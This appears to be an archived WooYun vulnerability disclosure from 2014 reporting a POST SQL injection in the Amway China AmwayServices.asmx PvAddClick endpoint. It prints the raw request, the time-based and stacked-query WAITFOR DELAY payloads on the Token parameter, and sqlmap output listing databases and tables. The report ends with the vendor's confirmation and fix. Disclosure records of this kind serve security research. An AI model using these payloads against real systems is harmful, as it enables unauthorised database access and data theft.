乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-07: 细节已通知厂商并且等待厂商处理中 2014-03-11: 厂商已经确认,细节仅向厂商公开 2014-03-21: 细节向核心白帽子及相关领域专家公开 2014-03-31: 细节向普通白帽子公开 2014-04-10: 细节向实习白帽子公开 2014-04-21: 细节向公众公开
SQL注入
WebService接口http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick存在post型sql注入漏洞
POST /amwayplaza/AmwayServices.asmx/PvAddClick HTTP/1.1Host: www.amway.com.cnProxy-Connection: keep-aliveContent-Length: 26Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.amway.com.cnUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClickAccept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie: arp_scroll_position=0Token=1&Title=2&Category=3
sqlmap identified the following injection points with a total of 94 HTTP(s) requests:---Place: POSTParameter: Token Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: Token Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012available databases [16]:[*] Amway[*] amway_main[*] AmwayProduct[*] AmwaySearch[*] dbIBOXMS_Amway[*] dbIBOXMS_Main[*] dbIBOXMS_Main_in[*] IBOX_AmwayPlaza[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] WebCrawl[*] WebCrawlACTI
Database: Amway[12 tables]+------------------+| FA_Product || FA_Product_amway || FA_Product_aynex || dtproperties || tbAdmin || tbClick || tbRoom || tbRoomProduct || tbVisit || tbVisitReport || tbqallary || tbqallaryImg |+------------------+
非常耗时,没继续测了
你懂得
危害等级:低
漏洞Rank:4
确认时间:2014-03-11 11:50
该漏洞已经确认,并修复,多谢白帽子提供。
2014-04-21:漏洞已經修復,多謝白帽子的支持